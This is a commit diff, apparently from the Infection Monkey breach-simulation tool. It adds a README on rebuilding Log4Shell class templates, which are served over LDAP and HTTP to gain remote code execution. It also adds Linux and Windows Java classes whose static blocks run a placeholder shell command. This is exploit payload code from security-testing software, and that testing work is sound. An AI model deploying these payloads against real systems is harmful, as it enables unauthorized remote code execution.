Agent: Add source code for log4shell Java class templates

monkey/infection_monkey/exploit/log4shell_utils/JAVA_CLASS_README.md

@@ -0,0 +1,31 @@
+# Building Java class templates for log4shell
+
+## Summary
+The log4shell exploiter provides two files, `LinuxExploit.class.template` and
+`WindowsExploit.class.templete`. These files are served to a vulnerable machine
+via LDAP and HTTP to achieve remote code execution. This README file contains
+instructions for rebuilding these template files should it ever become
+necessary.
+
+## Proceedure
+
+1. Copy the desired Linux or Windows Java source code to a new file named
+   `Exploit.java`. Both Java source code files contain a class named `Exploit`.
+   When building Java classes, the class name and the file name must match
+   exactly.
+
+   ```
+   $ cp LinuxExploit.java Exploit.java
+   ```
+
+1. Use `javac` to build the Java class file.
+   ```
+   $ javac Exploit.java
+   ```
+
+1. Rename the `.class` file with the appropriate OS name.
+   ```
+   $ mv Exploit.class LinuxExploit.class.template
+   ```
+
+1. Remove the `Exploit.java` file, as it is no longer needed.

monkey/infection_monkey/exploit/log4shell_utils/LinuxExploit.java

@@ -0,0 +1,7 @@
+public class Exploit {
+    static {
+        try {
+            Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "###"});
+        } catch(Exception e) {}
+    }
+}

monkey/infection_monkey/exploit/log4shell_utils/WindowsExploit.java

@@ -0,0 +1,7 @@
+public class Exploit {
+    static {
+        try {
+            Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "###"});
+        } catch(Exception e) {}
+    }
+}